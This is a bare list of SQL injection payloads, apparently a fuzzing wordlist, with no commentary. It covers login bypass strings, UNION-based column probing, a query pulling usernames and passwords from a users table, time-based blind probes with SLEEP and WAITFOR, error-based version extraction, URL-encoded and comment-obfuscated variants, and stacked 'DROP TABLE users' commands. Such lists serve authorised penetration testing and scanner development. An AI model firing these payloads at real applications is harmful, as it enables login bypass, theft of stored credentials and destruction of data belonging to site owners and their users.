'
''
`
``
,
"
""
/
//
\
\\
;
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or 1=1--
' or 1=1#
' or 1=1/*
'or 1=1 or ''='
' OR '1'='1
' OR 1=1--
' OR 1=1#
') OR ('1'='1
') OR ('1'='1'--
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' GROUP BY 1--
1' GROUP BY 2--
1 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION ALL SELECT NULL--
1 AND 1=1
1 AND 1=2
1' AND '1'='1
1' AND '1'='2
' AND SLEEP(5)--
' AND SLEEP(5)#
'; SELECT SLEEP(5)--
1; SELECT SLEEP(5)--
'; DROP TABLE users--
1; DROP TABLE users--
admin'--
admin'#
admin'/*
' having 1=1--
' having 1=1#
' group by columnnames having 1=1--
-1 UNION SELECT 1,2,3--
0 UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
1 AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
1 OR (SELECT * FROM (SELECT(SLEEP(5)))a)--
' OR (SELECT * FROM (SELECT(SLEEP(5)))a)--
1; WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '0:0:5'--
1 AND 1=1--
0 OR 1=1--
0 OR 1=1#
') OR 1=1--
')) OR 1=1--
%27 OR %271%27=%271
%27%20OR%20%271%27%3D%271
1/**/AND/**/1=1
1%0aAND%0a1=1
1+AND+1=1
1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--
1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--
1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7e,(SELECT version()),0x7e))s), 8446744073709551610, 8446744073709551610)))--
